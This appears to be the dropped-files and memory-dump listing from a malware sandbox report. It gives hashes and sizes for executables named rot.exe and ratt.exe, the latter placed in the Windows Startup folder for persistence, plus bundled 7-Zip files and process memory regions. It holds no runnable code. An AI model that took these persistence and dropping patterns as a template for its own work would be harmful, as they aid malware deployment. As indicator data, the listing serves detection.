134cc3581ab51bced485bab8fb9259b35a4fad1db5e447a082d0386c481aa9d8e62ad66de383f47f5886f9bf9563252510008a02ab8e70886efea7941388a2bd

Download Submit
C:\Users\Admin\Music\rot.exe

Filesize
68.7MB

MD5
3b11bcfc6eb119a0c20e021f1d22eeba

SHA1
fb380220c2a8c0461f6f5b08ee425d22aa2c03ed

SHA256
f5e85b50357a0b3e16ec3521d67338c5439a28f8d83b6202504765ca177b1668

SHA512
a4962498157c8b7d0e9b5e6bea543df1101ce1c8631249be9efdee115bd09d10f4cc57e118076a846a42d77dd918974f7823ceb2c99afff50e1c74ae097b2504

Download Submit
C:\Users\Admin\Music\rot.exe

Filesize
60.3MB

MD5
44dd42714dcfd774893ded20b8db2cef

SHA1
106144684762b2689694475ad49dc8a9dbe83b43

SHA256
88b8de25441c0fbc271837898955713cfd37bc820d105f21b3f2e52e2974e292

SHA512
0055ce90078f96f57606c28da2fcca13cc329767919953931d97c3b79b1da3568cf9f5815927e3f0b7a95731eb371bb4500f7696f7446ab81803a87591ca5448

Download Submit
C:\Users\Admin\Music\rot.exe

Filesize
64.2MB

MD5
2f4bbb6de4a37fc523579e2f9a1764c1

SHA1
7660f3b0b5dc2b77ac21cf8a867e5d988b87cbf0

SHA256
424bb34e050888830e29b0375c3828af2f8fc4c25faf0f0697b776bef38b7f9c

SHA512
a2197f24bfc87d4c4718c5692726928505cf2b22440418876706b506f8502fc724df6cac8a11f4e698d63249fa57598936ac1663f9fb497d3f4b8289b1662f11

Download Submit
\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe

Filesize
154.0MB

MD5
d206194d75200f97a69e904de1583a3f

SHA1
5b29b7784dd7735626da92fc81166e06b27ba071

SHA256
34f0a5aa756314b98ee2963ff6fb575664deb1c0bc141e44f405223d47eaaae7

SHA512
91eb846ad6d9b81bd7a7b78508e2966e505dbb82a0bdfcf0243a002f4868b59a3d50d0e3cbb0dd06c552745c0127a842de949235e41e21607ef3aa63df691045

Download Submit
\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
328KB

MD5
15bbbe562f9be3e5dcbb834e635cc231

SHA1
7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

SHA256
ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

SHA512
769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

Download Submit
\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
211.2MB

MD5
b3024a315c1f1685f1ceeffca0c561f1

SHA1
4c598f938ee7a9343375fe1e29182e25313926ae

SHA256
6ac63b28750017e65078891adf3054eb53beb9fdb5f95f02d198414e10c6678e

SHA512
166b5ea172936e339b330ed5476d8931b1d77ffb5ba5113059cde6ef299ab0336a6ced3e228ca7e85332b44427ecf976c7114dadca184dc6f436d84cb55aa777

Download Submit
\Users\Admin\Music\rot.exe

Filesize
66.3MB

MD5
cfbe11d7082ca8ae37768b1f654d4259

SHA1
f26b7fccdc140f54e0b0e324cad5a1b677f7bff3

SHA256
040a727d863a02886b31bd5d21175d72ed32b3f4df15a684be7a7095364ad8a0

SHA512
68e0016fc7745bd0f8c44498e0f2bff87fa39a8f02cfeff328dde85db295f4166b4fdc9f215f8a8cb692bb4f94b4c253686a591365e1672846a5b044c1bfea1f

Download Submit
memory/544-162-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1068-51-0x0000000073C10000-0x00000000741BB000-memory.dmp

Filesize
5.7MB

Download
memory/1068-50-0x00000000027F0000-0x0000000002830000-memory.dmp

Filesize
256KB

Download
memory/1068-49-0x00000000027F0000-0x0000000002830000-memory.dmp

Filesize
256KB

Download
memory/1068-48-0x0000000073C10000-0x00000000741BB000-memory.dmp

Filesize
5.7MB

Download
memory/1068-47-0x0000000073C10000-0x00000000741BB000-memory.dmp

Filesize
5.7MB

Download
memory/1540-120-0x0000000000550000-0x0000000000596000-memory.dmp

Filesize
280KB

Download
memory/1540-125-0x00000000701E0000-0x00000000708CE000-memory.dmp

Filesize
6.9MB

Download
memory/1540-116-0x00000000701E0000-0x00000000708CE000-memory.dmp

Filesize
6.9MB

Download
memory/1540-117-0x0000000000E10000-0x0000000000FC6000-memory.dmp

Filesize
1.7MB

Download
memory/1540-118-0x0000000004C10000-0x0000000004C50000-memory.dmp

Filesize
256KB

Download
memory/1540-123-0x00000000701E0000-0x00000000708CE000-memory.dmp

Filesize
6.9MB

Download
memory/1540-124-0x0000000004C10000-0x0000000004C50000-memory.dmp

Filesize
256KB

Download
memory/1616-105-0x00000000026A0000-0x00000000026E0000-memory.dmp

Filesize
256KB

Download
memory/1616-104-0x00000000026A0000-0x00000000026E0000-memory.dmp

Filesize
256KB

Download
memory/1616-103-0x0000000073C40000-0x00000000741EB000-memory.dmp

Filesize
5.7MB

Download
memory/1616-97-0x0000000073C40000-0x00000000741EB000-memory.dmp

Filesize
5.7MB

Download
memory/1616-100-0x00000000026A0000-0x00000000026E0000-memory.dmp

Filesize
256KB

Download
memory/1616-101-0x00000000026A0000-0x00000000026E0000-memory.dmp

Filesize
256KB

Download
memory/1616-98-0x0000000073C40000-0x00000000741EB000-memory.dmp

Filesize
5.7MB

Download
memory/1616-99-0x00000000026A0000-0x00000000026E0000-memory.dmp

Filesize
256KB

Download
memory/1616-113-0x0000000073C40000-0x00000000741EB000-memory.dmp

Filesize
5.7MB

Download
memory/1768-136-0x0000000074220000-0x000000007490E000-memory.dmp

Filesize
6.9MB

Download
memory/1768-138-0x0000000074220000-0x000000007490E000-memory.dmp

Filesize
6.9MB

Download
memory/1768-139-0x0000000000980000-0x000000000099A000-memory.dmp

Filesize
104KB

Download
memory/1768-140-0x0000000000690000-0x0000000000696000-memory.dmp

Filesize
24KB

Download
memory/1768-141-0x0000000004C60000-0x0000000004CA0000-memory.dmp

Filesize
256KB

Download
memory/1768-137-0x0000000000AF0000-0x0000000000CA6000-memory.dmp

Filesize
1.7MB

Download
memory/1944-67-0x0000000073C10000-0x00000000741BB000-memory.dmp

Filesize
5.7MB

Download
memory/1944-69-0x0000000073C10000-0x00000000741BB000-memory.dmp

Filesize
5.7MB

Download
memory/1944-68-0x00000000025E0000-0x0000000002620000-memory.dmp

Filesize
256KB

Download
memory/1944-66-0x0000000073C10000-0x00000000741BB000-memory.dmp

Filesize
5.7MB

Download
memory/2152-143-0x00000000000B0000-0x000000000010E000-memory.dmp

Filesize
376KB

Download
memory/2152-146-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2152-145-0x00000000000B0000-0x000000000010E000-memory.dmp

Filesize
376KB

Download
memory/2152-144-0x00000000000B0000-0x000000000010E000-memory.dmp

Filesize
376KB

Download
memory/2152-142-0x00000000000B0000-0x000000000010E000-memory.dmp

Filesize
376KB

Download
memory/2384-112-0x0000000000D50000-0x0000000000D90000-memory.dmp

Filesize
256KB

Download
memory/2384-126-0x00000000701E0000-0x00000000708CE000-memory.dmp

Filesize
6.9MB

Download
memory/2384-110-0x00000000701E0000-0x00000000708CE000-memory.dmp

Filesize
6.9MB

Download
memory/2384-109-0x0000000001220000-0x00000000013D6000-memory.dmp

Filesize
1.7MB

Download
memory/2384-119-0x00000000005F0000-0x0000000000636000-memory.dmp

Filesize
280KB

Download
memory/2384-121-0x00000000701E0000-0x00000000708CE000-memory.dmp

Filesize
6.9MB

Download
memory/2384-122-0x0000000000D50000-0x0000000000D90000-memory.dmp

Filesize
256KB

Download
memory/2564-37-0x00000000026E0000-0x0000000002720000-memory.dmp

Filesize
256KB

Download
memory/2564-39-0x00000000026E0000-0x0000000002720000-memory.dmp

Filesize
256KB

Download
memory/2564-36-0x0000000073C30000-0x00000000741DB000-memory.dmp

Filesize
5.7MB

Download
memory/2564-41-0x0000000073C30000-0x00000000741DB000-memory.dmp

Filesize
5.7MB

Download
memory/2564-40-0x0000000073C30000-0x00000000741DB000-memory.dmp

Filesize
5.7MB

Download
memory/2564-38-0x00000000026E0000-0x0000000002720000-memory.dmp

Filesize
256KB

Download
memory/2576-82-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2576-75-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2576-79-0x0000000010000000-0x00000000100E2000-memory.dmp

Filesize
904KB

Download
memory/2576-88-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2716-152-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2736-81-0x0000000000420000-0x0000000000452000-memory.dmp

Filesize
200KB

Download
memory/2736-73-0x0000000000420000-0x0000000000452000-memory.dmp

Filesize
200KB

Download
memory/2736-78-0x0000000000420000-0x0000000000452000-memory.dmp

Filesize
200KB

Download
memory/2736-85-0x0000000000420000-0x0000000000452000-memory.dmp

Filesize
200KB

Download
memory/2844-57-0x0000000073C30000-0x00000000741DB000-memory.dmp

Filesize
5.7MB

Download
memory/2844-60-0x0000000073C30000-0x00000000741DB000-memory.dmp

Filesize
5.7MB

Download
memory/2844-59-0x0000000073C30000-0x00000000741DB000-memory.dmp

Filesize
5.7MB

Download
memory/2844-58-0x00000000026C0000-0x0000000002700000-memory.dmp

Filesize
256KB

Download
memory/3048-30-0x0000000073EE0000-0x000000007448B000-memory.dmp

Filesize
5.7MB

Download
memory/3048-27-0x0000000073EE0000-0x000000007448B000-memory.dmp

Filesize
5.7MB

Download
memory/3048-28-0x00000000025B0000-0x00000000025F0000-memory.dmp

Filesize
256KB

Download
memory/3048-29-0x00000000025B0000-0x00000000025F0000-memory.dmp

Filesize
256KB

Download
memory/3048-26-0x0000000073EE0000-0x000000007448B000-memory.dmp

Filesize
5.7MB

Download